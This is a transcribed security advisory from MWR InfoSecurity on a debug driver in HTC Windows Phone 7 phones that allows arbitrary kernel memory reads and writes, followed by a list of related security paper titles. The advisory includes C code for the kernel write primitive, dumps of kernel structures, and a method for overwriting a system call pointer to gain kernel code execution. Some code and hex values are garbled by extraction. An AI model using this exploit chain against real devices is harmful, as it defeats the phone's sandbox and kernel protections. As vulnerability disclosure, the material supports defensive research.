HTC Windows Phone 7 Arbitrary Read/Write of Kernel Memory 10/11/2011
|
|
- Moses Morrison
- 8 years ago
- Views:
Transcription
1 MWR InfoSecurity Advisory HTC Windows Phone 7 Arbitrary Read/Write of Kernel Memory 10/11/2011 Package Name Date 10/11/2011 Affected Versions HTC Windows Phone 7 Phones HTC HD7 confirmed to be vulnerable. It is expected all versions of HTC Windows Phone 7 phones which contain HTCUtility driver are vulnerable. Author Severity Local/Remote Vulnerability Class Vendor Alex Plaskett High Risk Local Debug functionality provided in production phone HTC Description A device driver (HTCUtility.dll) was found which would allow an attacker to read/write arbitrary kernel memory through the use of a specific DeviceIoControl request. No security policies were found to restrict access to this device from the low privileged chamber. Impact This vulnerability could be used to execute code in kernel memory space effectively bypassing security mechanisms provided in user space. Cause It is expected that the cause of this vulnerability is vendor specific debug code being inadvertently included in a production build. Interim Workaround As an interim workaround a security policy could be provided by the vendor to limit access to this driver functionality. Solution A solution will require a patch from the vendor. It is expected that this debug functionality should be removed from production firmware before deployment. Multiple attempts were made to contact the vendor which were unsuccessful therefore MWR has decided to release this advisory. mwrinfosecurity.com MWR InfoSecurity 1 of 6
2 Introduction A vulnerability exists on HTC Windows 7 phones which include the HTCUtility device driver (HTCUtility.dll). This vulnerability can be used to perform arbitrary reads and writes of kernel memory. This vulnerability has been confirmed and tested on HTC HD7 and it is expected that other HTC Windows Phone 7 are also affected. The vulnerability exists due to the presence of what is assumed to be debug functionality left in retail devices from pre-production phones. The HTCUtility exposes functionality which would provide an attacker a method of reading and writing arbitrary memory. In order to understand the severity of this vulnerability then it is necessary for the Windows Phone 7 security model to be examined. Windows Phone 7 uses the concept of chambers to implement its security model. There are four chamber types (in order of privilege from highest to low) as follows: Trusted Computing Base (TCB) Fixed Permissions Elevated Rights Fixed Permissions Standard Rights Fixed Permissions Least Privilege Chamber (LPC) Dynamic Permissions When a third party Silverlight application is deployed a chamber is created using the Least Privilege Chamber permission set. Mobile Internet Explorer also was found to run in the least privileged chamber restricting the access that the browser has to resources on the system. When accessing a resource a security policy check is carried out to determine if the caller has access to the resource. The access checks are implemented in the kernel using SID s to identify the applications/users and a policy database to allow or deny access. As well as the chamber based sandbox model kernel enforces separation between user land and kernel space to ensure segregation between user space and kernel memory address spaces. The vulnerability identified allows an attacker to bypass these security restrictions by allowing arbitrary code to execute in kernel memory space (TCB). This would allow an attacker to disable any protection mechanisms implemented in the kernel. MWR InfoSecurity 2 of 6
3 Technical Description The device driver HTCUtility (HTCUtility.dll) exposes a DeviceIoControl code which provides read/write access to the entire virtual memory space of the phone (both user land and kernel memory space). It is necessary to open the device driver HTU0: to obtain a handle to the device driver (hdevice). The control code 0x C (dwiocontrolcode) is used for providing access to the read/write functionality. The input buffer (lpinbuffer) must be crafted in the following way: struct REQUEST DWORD bmode; PDWORD pdwaddress; }; The bmode flag denotes whether the desired access is read mode 0 or write mode 1. The pdwaddress specifies the address required to read or write at. In order to perform a write the output buffer must contain the data required to write at the address specified in the input buffer. Exploit Information The following function can be used to perform a write of kernel memory: #define IOCTL_HTU_ACCESS_REGISTER 0x C void stdcall PluginMem::WriteMemory(DWORD address, DWORD dwvalue, DWORD * ret) HANDLE h1 = CreateFileW(L"HTU0:",0xC ,0x3,0,0,0,0); DWORD result = dwvalue; struct REQUEST DWORD bmode; PDWORD pdwaddress; }; REQUEST req; memset(&req,0,sizeof(req)); req.bmode = 1; // 0 = Read, 1 = Write if (address == 1) req.pdwaddress = &value; else req.pdwaddress = (PDWORD) address; if (h1 == INVALID_HANDLE_VALUE) *ret = -1; return; } if (DeviceIoControl(h1,IOCTL_HTU_ACCESS_REGISTER,&req,0x8,&result,0x4,0,0)) MWR InfoSecurity 3 of 6
4 } } else } *ret = result; *ret = -1; To read kernel memory the bmode flag can be switched to 0. In order to gain code execution in the context of the kernel a function pointer to a system call was chosen to be overwritten with an attacker controlled address. This attacker controlled address would point at arbitrary controlled attacker code which would execute in the context of the kernel. In Windows CE 6 and 7 (which Windows Phone 7 is based on) when a system call is made from user space an exception is triggered which is handled by the prefetch abort handler in the kernel. The prefetch abort handler passes this off to the system call table to locate the function to call. The system call dispatch table is implemented using an array of APISets structures. In order to locate the system call table the following method was used. The KDataStruct was chosen because it resides at a fixed memory address (0xFFFFC800). The KDataStuct contains a large amount of important information used by the kernel to keep track of resources. The KDataStruct is made up of the following elements: struct KDataStruct LPDWORD lpvtls; /* 0x000 Current thread local storage pointer */ 4 bytes HANDLE ahsys[num_sys_handles]; /* 0x004 If this moves, change kapi.h */ 128 handles char bresched; /* 0x084 reschedule flag */ char cnest; /* 0x085 kernel exception nesting */ char bpoweroff; /* 0x086 TRUE during "power off" processing */ char bprofileon; /* 0x087 TRUE if profiling enabled */ ulong unused; /* 0x088 unused */ ulong rsvd2; /* 0x08c was DiffMSec */ PPROCESS pcurprc; /* 0x090 ptr to current PROCESS struct */ PTHREAD pcurthd; /* 0x094 ptr to current THREAD struct */ DWORD dwkcres; /* 0x098 */ ulong handlebase; /* 0x09c handle table base address */ PSECTION asections[64]; /* 0x0a0 section table for virutal memory */ LPEVENT alpeintrevents[sysintr_max_devices];/* 0x1a0 */ LPVOID alpvintrdata[sysintr_max_devices]; /* 0x220 */ ulong papireturn; /* 0x2a0 direct API return address for kernel mode */ uchar *pmap; /* 0x2a4 ptr to MemoryMap array */ DWORD dwindebugger; /* 0x2a8!0 when in debugger */ PTHREAD pcurfpuowner; /* 0x2ac current FPU owner */ PPROCESS pcpuasidprc; /* 0x2b0 current ASID proc */ long nmemforpt; /* 0x2b4 - Memory used for PageTables */ long alpad[18]; /* 0x2b8 - padding */ DWORD ainfo[32]; /* 0x300 - misc. kernel info */ } /* KDataStruct */ The ainfo[32] array contains important kernel information that can help locate the system call tables. MWR InfoSecurity 4 of 6
5 The data at that address was then dumped (0xFFFFC x300 = 0xFFFFCB00). As shown below: Address: FFFFCB00 Data: Address: FFFFCB04 Data: Address: FFFFCB08 Data: Address: FFFFCB0C Data: FFFFF000 Address: FFFFCB10 Data: F Address: FFFFCB14 Data: D5 Address: FFFFCB18 Data: A8 Address: FFFFCB1C Data: Address: FFFFCB20 Data: 80997C20 Address: FFFFCB24 Data: Address: FFFFCB28 Data: Address: FFFFCB2C Data: 0001DA91 Address: FFFFCB30 Data: 807F4188 Address: FFFFCB34 Data: FFFFC800 Address: FFFFCB38 Data: Address: FFFFCB3C Data: Address: FFFFCB40 Data: FFFFC830 Address: FFFFCB44 Data: Address: FFFFCB48 Data: Address: FFFFCB4C Data: E4 Address: FFFFCB50 Data: Address: FFFFCB54 Data: Address: FFFFCB58 Data: 00000BC0 Address: FFFFCB5C Data: Address: FFFFCB60 Data: address of process array system page size shift for page # in PTE mask for page # in PTE # of free physical pages # of pages used by kernel ptr to kernel heap array ptr to sectiontable array ptr to system memoryinfo struct ptr to module list lower bound of DLL shared space total # of RAM pages ptr to ROM table of contents ptr to kernel mode version of KData Current amount of gwes heap in use Fast timezone bias info Default System locale Default User locale Kernel heap wasted space For use by debugger for protocol communication APIset pointer The APIset pointer points at the following data structure. typedef struct _CINFO char acname[4]; /* 00: object type ID string */ uchar disp; /* 04: type of dispatch */ uchar type; /* 05: api handle type */ ushort cmethods; /* 06: # of methods in dispatch table */ const PFNVOID *ppfnextmethods; /* 08: ptr to array of methods... const PFNVOID *ppfnintmethods; /* 0C: ptr to array of methods... const ULONGLONG *pu64sig; /* 10: ptr to array of method si... DWORD dwserverid; /* 14: server process id */ PHDATA phdapiset; /* 18: HDATA of API set */ PFNAPIERRHANDLER pfnerrorhandler; /* 1C: ptr to the API s... } CINFO; typedef CINFO *PCINFO; The ppfnextmethods is a pointer to an array of functions which are used when a system call is made. The following caption shows the data dumped from these memory addresses: Address: Data: 80533AE0 ApiSet[0] -> ptr to CINFO struct _CINFO struct: Address: 80533AE0 Data: 32336E57 object type id char[4] Wn32 Address: 80533AE4 Data: 008C0003 disp, type, methods uchar, uchar, ushort (dist = 3, type = 0, cmethods = 8C) Address: 80533AE8 Data: ptr to external array of methods Ptr's in method table Address: Data: 80558B24 Method 0 Address: Data: 80558B24 Method 1 Address: Data: BC.. Address: C Data: F0 Address: Data: 80552C2C Address: Data: 8055BDD0 Address: Data: 8055BFD0 Address: C Data: Address: Data: C MWR InfoSecurity 5 of 6
6 Address: Data: 80567EE8 Address: Data: 80567F20 Address: C Data: 80567C80 Address: Data: 80567D0C Address: Data: 8055C368 Address: Data: 8056BF78 Address: C Data: 8056BA5C.. Address: 8056BA5C Data: E92D40F0 The system call CeGetRawTime was chosen to be used to patch to point at the attacker controlled code. The system call was defined as the following (therefore is element 126 in the table): #define W32_CeGetRawTime 126 At this stage the attacker can overwrite the pointer in the table to point at attacker controlled code. When a user land program then calls the system call which has been overwritten the attacker controlled function pointer will be used and the attacker s code will be executed in the context of the kernel. Shellcode creation is left as an exercise to the reader. Dependencies In order to exploit this vulnerability then it would require the attacker to already have code running on the device (for example in the least privileged chamber with ID_CAP_INTEROPSERVICES capability). However, this vulnerability can be used to circumvent the security model enforced by the Windows Phone 7 kernel chambers model from a low privileged chamber. MWR InfoSecurity 6 of 6
Exploiting Trustzone on Android
1 Introduction Exploiting Trustzone on Android Di Shen(@returnsme) retme7@gmail.com This paper tells a real story about exploiting TrustZone step by step. I target an implementation of Trusted Execution
More informationTitle: Bugger The Debugger - Pre Interaction Debugger Code Execution
White Paper Title: Bugger The Debugger Pre Interaction Debugger Code Execution Prepared by: Brett Moore Network Intrusion Specialist, CTO SecurityAssessment.com Date: April 2005 Abstract The use of debuggers
More informationBypassing Browser Memory Protections in Windows Vista
Bypassing Browser Memory Protections in Windows Vista Mark Dowd & Alexander Sotirov markdowd@au1.ibm.com alex@sotirov.net Setting back browser security by 10 years Part I: Introduction Thesis Introduction
More informationIOActive Security Advisory
IOActive Security Advisory Title Severity Discovered by Admin ACL Bypass and Double Fetch Issue in F-Secure Internet Security 2015 High/Important Ilja van Sprundel Advisory Date September 3, 2015 Affected
More informationhttp://www.nologin.org Bypassing Windows Hardware-enforced Data Execution Prevention
http://www.nologin.org Bypassing Windows Hardware-enforced Data Execution Prevention Oct 2, 2005 skape mmiller@hick.org Skywing Skywing@valhallalegends.com One of the big changes that Microsoft introduced
More informationMWR InfoSecurity Advisory. Interwoven Worksite ActiveX Control Remote Code Execution. 10 th March 2008. Contents
Contents MWR InfoSecurity Advisory Interwoven Worksite ActiveX Control Remote Code Execution 10 th March 2008 2008-03-10 Page 1 of 9 Contents Contents 1 Detailed Vulnerability Description...5 1.1 Introduction...5
More informationFormat string exploitation on windows Using Immunity Debugger / Python. By Abysssec Inc WwW.Abysssec.Com
Format string exploitation on windows Using Immunity Debugger / Python By Abysssec Inc WwW.Abysssec.Com For real beneficiary this post you should have few assembly knowledge and you should know about classic
More informationBypassing Memory Protections: The Future of Exploitation
Bypassing Memory Protections: The Future of Exploitation Alexander Sotirov alex@sotirov.net About me Exploit development since 1999 Research into reliable exploitation techniques: Heap Feng Shui in JavaScript
More informationApplication Note. Introduction AN2471/D 3/2003. PC Master Software Communication Protocol Specification
Application Note 3/2003 PC Master Software Communication Protocol Specification By Pavel Kania and Michal Hanak S 3 L Applications Engineerings MCSL Roznov pod Radhostem Introduction The purpose of this
More informationMWR InfoSecurity Security Advisory. pfsense DHCP Script Injection Vulnerability. 25 th July 2008. Contents
Contents MWR InfoSecurity Security Advisory pfsense DHCP Script Injection Vulnerability 25 th July 2008 2008-07-25 Page 1 of 10 Contents Contents 1 Detailed Vulnerability Description... 5 1.1 Technical
More informationMWR InfoSecurity Security Advisory. Symantec s Altiris Deployment Solution File Transfer Race Condition. 7 th January 2010
al al MWR InfoSecurity Security Advisory Symantec s Altiris Deployment Solution File Transfer Race Condition 7 th January 2010 20010-01-07 Page 1 of 8 Contents Contents 1 Detailed Vulnerability Description...4
More informationThe Sandbox Roulette: are you ready to gamble? Rafal Wojtczuk rafal@bromium.com Rahul Kashyap rahul@bromium.com
The Sandbox Roulette: are you ready to gamble? Rafal Wojtczuk rafal@bromium.com Rahul Kashyap rahul@bromium.com What is a sandbox? Environment designed to run untrusted (or exploitable) code, in a manner
More informationWindows Phone 7 Internals and Exploitability
Windows Phone 7 Internals and Exploitability (abridged white paper) Tsukasa Oi Research Engineer 目 次 1. Abstract... 3 2. Introduction: Windows Phone 7 and Analysis... 3 3. Security Analysis Windows Phone
More informationMWR InfoSecurity Security Advisory. BT Home Hub SSID Script Injection Vulnerability. 10 th May 2010. Contents
Contents MWR InfoSecurity Security Advisory BT Home Hub SSID Script Injection Vulnerability 10 th May 2010 2010-05-10 Page 1 of 8 Contents Contents 1 Detailed Vulnerability Description... 5 1.1 Technical
More informationHotpatching and the Rise of Third-Party Patches
Hotpatching and the Rise of Third-Party Patches Alexander Sotirov asotirov@determina.com BlackHat USA 2006 Overview In the next one hour, we will cover: Third-party security patches _ recent developments
More informationHelping you avoid stack overflow crashes!
Helping you avoid stack overflow crashes! One of the toughest (and unfortunately common) problems in embedded systems is stack overflows and the collateral corruption that it can cause. As a result, we
More informationWLSI Windows Local Shellcode Injection. Cesar Cerrudo Argeniss (www.argeniss.com)
WLSI Windows Local Shellcode Injection Cesar Cerrudo Argeniss (www.argeniss.com) Overview _ Introduction _ Establishing a LPC connection _ Creating a shared section _ The technique _ Building an exploit
More informationVICE Catch the hookers! (Plus new rootkit techniques) Jamie Butler Greg Hoglund
VICE Catch the hookers! (Plus new rootkit techniques) Jamie Butler Greg Hoglund Agenda Introduction to Rootkits Where to Hook VICE detection Direct Kernel Object Manipulation (DKOM) No hooking required!
More informationComputer Security: Principles and Practice
Computer Security: Principles and Practice Chapter 24 Windows and Windows Vista Security First Edition by William Stallings and Lawrie Brown Lecture slides by Lawrie Brown Windows and Windows Vista Security
More informationOff-by-One exploitation tutorial
Off-by-One exploitation tutorial By Saif El-Sherei www.elsherei.com Introduction: I decided to get a bit more into Linux exploitation, so I thought it would be nice if I document this as a good friend
More informationAttacking Host Intrusion Prevention Systems. Eugene Tsyrklevich eugene@securityarchitects.com
Attacking Host Intrusion Prevention Systems Eugene Tsyrklevich eugene@securityarchitects.com Agenda Introduction to HIPS Buffer Overflow Protection Operating System Protection Conclusions Demonstration
More informationCANnes PC CAN Interface Manual
CANnes PC CAN Interface Manual Version: 1.21 October 1 st, 2004 D 20375 Hamburg, Germany Phone +49-40-51 48 06 0 FAX: +49-40-51 48 06 60 2 CANnes Card Manual V1.21 Version Version Date Author Comment 1.00
More informationVirtualization System Security
Virtualization System Security Bryan Williams, IBM X-Force Advanced Research Tom Cross, Manager, IBM X-Force Security Strategy 2009 IBM Corporation Overview Vulnerability disclosure analysis Vulnerability
More informationWindows XP SP3 Registry Handling Buffer Overflow
Windows XP SP3 Registry Handling Buffer Overflow by Matthew j00ru Jurczyk and Gynvael Coldwind Hispasec 1. Basic Information Name Windows XP SP3 Registry Handling Buffer Overflow Class Design Error Impact
More informationWebView addjavascriptinterface Remote Code Execution 23/09/2013
MWR InfoSecurity Advisory WebView addjavascriptinterface Remote Code Execution 23/09/2013 Package Name Date Affected Versions Google Android Webkit WebView 23/09/2013 All Android applications built with
More information風 水. Heap Feng Shui in JavaScript. Alexander Sotirov. asotirov@determina.com
風 水 Heap Feng Shui in JavaScript Alexander Sotirov asotirov@determina.com Black Hat Europe 2007 Introduction What is Heap Feng Shui? the ancient art of arranging heap blocks in order to redirect the program
More informationHooking Nirvana RECON 2015 ALEX IONESCU @AIONESCU 1/26/2016 COPYRIGHT 2015 ALEX IONESCU. ALL RIGHTS RESERVED. 1
Hooking Nirvana STEALTHY INSTRUMENTATION TECHNIQUES RECON 2015 ALEX IONESCU @AIONESCU 1/26/2016 COPYRIGHT 2015 ALEX IONESCU. ALL RIGHTS RESERVED. 1 WHO AM I? Chief Architect at CrowdStrike, a security
More informationEaseVault File System Filter SDK Manual
Introduction File system filter driver A file system filter driver intercepts requests targeted at a file system or another file system filter driver. By intercepting the request before it reaches its
More informationReview and Exploit Neglected Attack Surface in ios 8. Tielei Wang, Hao Xu, Xiaobo Chen of TEAM PANGU
Review and Exploit Neglected Attack Surface in ios 8 Tielei Wang, Hao Xu, Xiaobo Chen of TEAM PANGU BlackHat 2015 Agenda ios Security Background Review of Attack Surfaces Fuzz More IOKit and MIG System
More informationSMTP-32 Library. Simple Mail Transfer Protocol Dynamic Link Library for Microsoft Windows. Version 5.2
SMTP-32 Library Simple Mail Transfer Protocol Dynamic Link Library for Microsoft Windows Version 5.2 Copyright 1994-2003 by Distinct Corporation All rights reserved Table of Contents 1 Overview... 5 1.1
More informationThe Leader in Cloud Security SECURITY ADVISORY
The Leader in Cloud Security SECURITY ADVISORY Security Advisory - December 14, 2010 Zscaler Provides Protection in the Face of Significant Microsoft Year End Patch Cycle Zscaler, working with Microsoft
More informationSoftware security. Buffer overflow attacks SQL injections. Lecture 11 EIT060 Computer Security
Software security Buffer overflow attacks SQL injections Lecture 11 EIT060 Computer Security Buffer overflow attacks Buffer overrun is another common term Definition A condition at an interface under which
More informationSoftware Vulnerabilities
Software Vulnerabilities -- stack overflow Code based security Code based security discusses typical vulnerabilities made by programmers that can be exploited by miscreants Implementing safe software in
More informationOperating Systems and Networks
recap Operating Systems and Networks How OS manages multiple tasks Virtual memory Brief Linux demo Lecture 04: Introduction to OS-part 3 Behzad Bordbar 47 48 Contents Dual mode API to wrap system calls
More informationJorix kernel: real-time scheduling
Jorix kernel: real-time scheduling Joris Huizer Kwie Min Wong May 16, 2007 1 Introduction As a specialized part of the kernel, we implemented two real-time scheduling algorithms: RM (rate monotonic) and
More informationPCI-SIG ENGINEERING CHANGE REQUEST
PCI-SIG ENGINEERING CHANGE REQUEST TITLE: Update DMTF SM CLP Specification References DATE: 8/2009 AFFECTED DOCUMENT: PCIFW30_CLP_1_0_071906.pdf SPONSOR: Austin Bolen, Dell Inc. Part I 1. Summary of the
More informationExploiting nginx chunked overflow bug, the undisclosed attack vector
Exploiting nginx chunked overflow bug, the undisclosed attack vector Long Le longld@vnsecurity.net About VNSECURITY.NET CLGT CTF team 2 VNSECURITY.NET In this talk Nginx brief introduction Nginx chunked
More informationCustom Penetration Testing
Custom Penetration Testing Compromising a Vulnerability through Discovery and Custom Exploitation Stephen Sims Advanced Penetration Testing - 2009 SANS 1 Objectives Penetration Testing Precompiled Tools
More informationLast Class: OS and Computer Architecture. Last Class: OS and Computer Architecture
Last Class: OS and Computer Architecture System bus Network card CPU, memory, I/O devices, network card, system bus Lecture 3, page 1 Last Class: OS and Computer Architecture OS Service Protection Interrupts
More informationClient-server Sockets
Client-server Sockets 1 How to Write a Network Based Program (Using Microchip's TCP/IP Stack) A network based program that uses the Client-server architecture must create at least two separate programs,
More informationesrever gnireenigne tfosorcim seiranib
esrever gnireenigne tfosorcim seiranib Alexander Sotirov asotirov@determina.com CanSecWest / core06 Reverse Engineering Microsoft Binaries Alexander Sotirov asotirov@determina.com CanSecWest / core06 Overview
More informationIntroduction to computer and network security. Session 2 : Examples of vulnerabilities and attacks pt1
Introduction to computer and network security Session 2 : Examples of vulnerabilities and attacks pt1 Jean Leneutre jean.leneutre@telecom-paristech.fr Tél.: 01 45 81 78 81 Page 1 Outline I- Introduction
More informationSandbox Roulette: Are you ready for the gamble?
Sandbox Roulette: Are you ready for the gamble? Rafal Wojtczuk rafal@bromium.com Rahul Kashyap rahul@bromium.com What is a sandbox? In computer security terminology, a sandbox is an environment designed
More informationHacking Techniques & Intrusion Detection. Ali Al-Shemery arabnix [at] gmail
Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail All materials is licensed under a Creative Commons Share Alike license http://creativecommonsorg/licenses/by-sa/30/ # whoami Ali
More informationSource Code Security Analysis Tool Functional Specification Version 1.0
Special Publication 500-268 Source Code Security Analysis Tool Functional Specification Version 1.0 Paul E. Black Michael Kass Michael Koo Software Diagnostics and Conformance Testing Division Information
More informationDefense in Depth: Protecting Against Zero-Day Attacks
Defense in Depth: Protecting Against Zero-Day Attacks Chris McNab FIRST 16, Budapest 2004 Agenda Exploits through the ages Discussion of stack and heap overflows Common attack behavior Defense in depth
More informationAbusing the Windows WiFi native API to create a Covert Channel
Abusing the Windows WiFi native API to create a Covert Channel Andrés Blanco, Ezequiel Gutesman Core Security Technologies April 13, 2011 Abstract Communications over wireless channels have been perfectioned
More informationI Control Your Code Attack Vectors Through the Eyes of Software-based Fault Isolation. Mathias Payer, ETH Zurich
I Control Your Code Attack Vectors Through the Eyes of Software-based Fault Isolation Mathias Payer, ETH Zurich Motivation Applications often vulnerable to security exploits Solution: restrict application
More informationPrinted Exception strings - what do all
Printed Exception strings - what do all those flags mean? Data Abort: Thread=9352cc9c Proc=90876ea0 'shell32.exe' AKY=00000005 PC=03f74680(coredll.dll+0x00014680) RA=03257104(aygshell.dll+0x00037104) BVA=060000e0
More informationToasterkit - A NetBSD Rootkit. Anthony Martinez Thomas Bowen http://mrtheplague.net/toasterkit/
Toasterkit - A NetBSD Rootkit Anthony Martinez Thomas Bowen http://mrtheplague.net/toasterkit/ Toasterkit - A NetBSD Rootkit 1. Who we are 2. What is NetBSD? Why NetBSD? 3. Rootkits on NetBSD 4. Architectural
More informationField Software Updates Using TPMS LF An example using the Low Frequency radio (LFR) for wireless software updating
Freescale Semiconductor Document Number: AN5149 Application Note Rev. 1.0, 8/2015 Field Software Updates Using TPMS LF An example using the Low Frequency radio (LFR) for wireless software updating 1 Introduction
More informationPersist It Using and Abusing Microsoft s Fix It Patches
Persist It Using and Abusing Microsoft s Fix It Patches Jon Erickson : isight Partners : jerickson@isightpartners.com Abstract: Microsoft has often used Fix it patches, which are a subset of Application
More informationUsing a Patched Vulnerability to Bypass Windows 8 x64 Driver Signature Enforcement. MJ0011 th_decoder@126.com
Using a Patched Vulnerability to Bypass Windows 8 x64 Driver Signature Enforcement MJ0011 th_decoder@126.com Agenda Background A Patched Vulnerability: CVE-2010-4398 Bypass DSE on Windows7 x64 Windows8
More informationMatrixSSL Developer s Guide
MatrixSSL Developer s Guide This document discusses developing with MatrixSSL. It includes instructions on integrating MatrixSSL into an application and a description of the configurable options for modifying
More informationOPERATING SYSTEMS STRUCTURES
S Jerry Breecher 2: OS Structures 1 Structures What Is In This Chapter? System Components System Calls How Components Fit Together Virtual Machine 2: OS Structures 2 SYSTEM COMPONENTS These are the pieces
More informationAttacking x86 Windows Binaries by Jump Oriented Programming
Attacking x86 Windows Binaries by Jump Oriented Programming L. Erdődi * * Faculty of John von Neumann, Óbuda University, Budapest, Hungary erdodi.laszlo@nik.uni-obuda.hu Abstract Jump oriented programming
More informationSoftware Application Development. D2XX Programmer's Guide
Future Technology Devices International Ltd. Software Application Development D2XX Programmer's Guide Document Reference No.: FT_000071 Version 1.3 Issue Date: 2012-02-23 FTDI provides DLL and virtual
More informationViolating Database - Enforced Security Mechanisms
Violating Database - Enforced Security Mechanisms Runtime Patching Exploits in SQL Server 2000: a case study Chris Anley [chris@ngssoftware.com] 18/06/2002 An NGSSoftware Insight Security Research (NISR)
More informationAuditing ActiveX Controls. Cesar Cerrudo Independent Security Researcher/Consultant
Auditing ActiveX Controls Cesar Cerrudo Independent Security Researcher/Consultant Outline ActiveX definition ActiveX security Auditing ActiveX Demo Preventing ActiveX exploitation References ActiveX control
More informationMoritz Jodeit moritz.jodeit@nruns.com Twitter: @moritzj
Moritz Jodeit moritz.jodeit@nruns.com Twitter: @moritzj Agenda Attack Surface Firmware Analysis Device Rooting System Architecture Vulndev Environment Remote H.323 Exploit Post Exploitation Who am I? From
More informationSRUM forensics. Yogesh Khatri Champlain College
RUM forensics Yogesh Khatri Champlain College What is RUM? ystem Resource Usage Monitor First seen in Windows 8 Part of Diagnostic Policy ervice Technology that monitors desktop application programs, services,
More informationOperating System Manual. Realtime Communication System for netx. Kernel API Function Reference. www.hilscher.com.
Operating System Manual Realtime Communication System for netx Kernel API Function Reference Language: English www.hilscher.com rcx - Kernel API Function Reference 2 Copyright Information Copyright 2005-2007
More informationChapter 15 Operating System Security
Operating Systems: Internals and Design Principles Chapter 15 Operating System Security Eighth Edition By William Stallings System Access Threats System access threats fall into two general categories:
More informationBuffer Overflows. Code Security: Buffer Overflows. Buffer Overflows are everywhere. 13 Buffer Overflow 12 Nov 2015
CSCD27 Computer and Network Security Code Security: Buffer Overflows 13 Buffer Overflow CSCD27 Computer and Network Security 1 Buffer Overflows Extremely common bug. First major exploit: 1988 Internet
More informationEugene Tsyrklevich. Ozone HIPS: Unbreakable Windows
Eugene Tsyrklevich Eugene Tsyrklevich has an extensive security background ranging from designing and implementing Host Intrusion Prevention Systems to training people in research, corporate, and military
More informationUNCLASSIFIED Version 1.0 May 2012
Secure By Default: Platforms Computing platforms contain vulnerabilities that can be exploited for malicious purposes. Often exploitation does not require a high degree of expertise, as tools and advice
More informationHeartbleed. or: I read the news, too. Martin R. Albrecht. Information Security Group, Royal Holloway, University of London
Heartbleed or: I read the news, too Martin R. Albrecht Information Security Group, Royal Holloway, University of London XKCD #1354 XKCD #1354 XKCD #1354 XKCD #1354 XKCD #1354 XKCD #1354 RFC 6520: Transport
More informationImplementation and Implications of a Stealth Hard-Drive Backdoor
March 3rd 2014 OSSIR/JSSI 2014 Paper first presented at ACSAC 2013 Awarded Best Student Paper Award Implementation and Implications of a Stealth Hard-Drive Backdoor Jonas Zaddach Davide Balzarotti Aure
More informationAn Implementation Of Multiprocessor Linux
An Implementation Of Multiprocessor Linux This document describes the implementation of a simple SMP Linux kernel extension and how to use this to develop SMP Linux kernels for architectures other than
More informationWhere s the FEEB? The Effectiveness of Instruction Set Randomization
Where s the FEEB? The Effectiveness of Instruction Set Randomization Ana Nora Sovarel David Evans Nathanael Paul University of Virginia, Department of Computer Science http://www.cs.virginia.edu/feeb Abstract
More informationMouse Programming. 25.1 Mouse Interrupts. 25.2 Useful Mouse functions. 25.2.1 Mouselib.h. 25.2.2 Mouselib.c
25 Show respect for all people. Mouse Programming As everyone knows, mouse is one of the inputting devices. In this chapter, I explain interrupts for mouse programming and a few concepts regarding mouse
More informationSpecific Simple Network Management Tools
Specific Simple Network Management Tools Jürgen Schönwälder University of Osnabrück Albrechtstr. 28 49069 Osnabrück, Germany Tel.: +49 541 969 2483 Email: Web:
More informationSecurityTracker Monday Morning Vulnerability Summary Oct 28, 2013
In This Week's SecurityTracker Vulnerability Summary SecurityTracker Alerts: 27 Vendors: Alstom - Apple Computer - CA - Cisco - EMC - F5 Networks - GNU [multiple authors] - Gnupg.org - Google - Joyent,
More informationFreescale MQX USB Device User Guide
Freescale MQX USB Device User Guide MQXUSBDEVUG Rev. 4 02/2014 How to Reach Us: Home Page: freescale.com Web Support: freescale.com/support Information in this document is provided solely to enable system
More informationIllustration 1: Diagram of program function and data flow
The contract called for creation of a random access database of plumbing shops within the near perimeter of FIU Engineering school. The database features a rating number from 1-10 to offer a guideline
More informationKernel Pool Exploitation on Windows 7
Kernel Pool Exploitation on Windows 7 Tarjei Mandt kernelpool@gmail.com Abstract. In Windows 7, Microsoft introduced safe unlinking to address the growing number of security bulletins affecting the Windows
More informationW4118 Operating Systems. Junfeng Yang
W4118 Operating Systems Junfeng Yang Outline Linux overview Interrupt in Linux System call in Linux What is Linux A modern, open-source OS, based on UNIX standards 1991, 0.1 MLOC, single developer Linus
More informationFast Byte-Granularity Software Fault Isolation
Fast Byte-Granularity Software Fault Isolation Miguel Castro, Manuel Costa, Jean-Philippe Martin, Marcus Peinado, Periklis Akritidis, Austin Donnelly, Paul Barham, Richard Black Microsoft Research Cambridge,
More informationEncrypting MySQL data at Google. Jonas Oreland and Jeremy Cole
Encrypting MySQL data at Google Jonas Oreland and Jeremy Cole bit.ly/google_innodb_encryption Jonas Oreland!! Software Engineer at Google Has worked on/with MySQL since 2003 Has a current crush on Taylor
More informationSlaying the Virtual Memory Monster - Part II
1 of 8 04/19/2012 07:53 PM Slaying the Virtual Memory Monster - Part II Reed Robison 1 Oct 2007 4:46 PM 17 Someday I ll learn to write a simple blog post a couple of paragraphs about something cool and
More informationKeil C51 Cross Compiler
Keil C51 Cross Compiler ANSI C Compiler Generates fast compact code for the 8051 and it s derivatives Advantages of C over Assembler Do not need to know the microcontroller instruction set Register allocation
More informationExample of Standard API
16 Example of Standard API System Call Implementation Typically, a number associated with each system call System call interface maintains a table indexed according to these numbers The system call interface
More informationADL User Guide for Open AT V4.10
ADL User Guide for Open AT V4.10 Revision: 002 Date: September 2006 ADL User Guide for Open AT V4.10 Revision: 002 Date: Reference: WM_DEV_OAT_UGD_019 Confidential Page: 1 / 220 Document History Index
More informationGoogle Apps Engine. G-Jacking AppEngine-based applications. Presented 20/11/2014. For NoSuchCon 2014 By Nicolas Collignon
Google Apps Engine G-Jacking AppEngine-based applications Presented 20/11/2014 For NoSuchCon 2014 By Nicolas Collignon Introduction to GAE G-Jacking The code The infrastructure The sandbox Conclusion Introduction
More informationRTEMS Porting Guide. On-Line Applications Research Corporation. Edition 4.10.99.0, for RTEMS 4.10.99.0. 17 July 2015
RTEMS Porting Guide Edition 4.10.99.0, for RTEMS 4.10.99.0 17 July 2015 On-Line Applications Research Corporation On-Line Applications Research Corporation TEXinfo 2013-02-01.11 COPYRIGHT c 1988-2015.
More informationAN249 HUMAN INTERFACE DEVICE TUTORIAL. Relevant Devices This application note applies to all Silicon Labs USB MCUs. 1.
HUMAN INTERFACE DEVICE TUTORIAL Relevant Devices This application note applies to all Silicon Labs USB MCUs. 1. Introduction The Human Interface Device (HID) class specification allows designers to create
More informationWindows 7 Security Event Log Format
Windows 7 ecurity vent Log Format Todd Heberlein 23 ep 2010 Windows security event log provides a rich source of information to detect and analyze a wide range of threats against computer systems. Unfortunately
More informationVirtuozzo Virtualization SDK
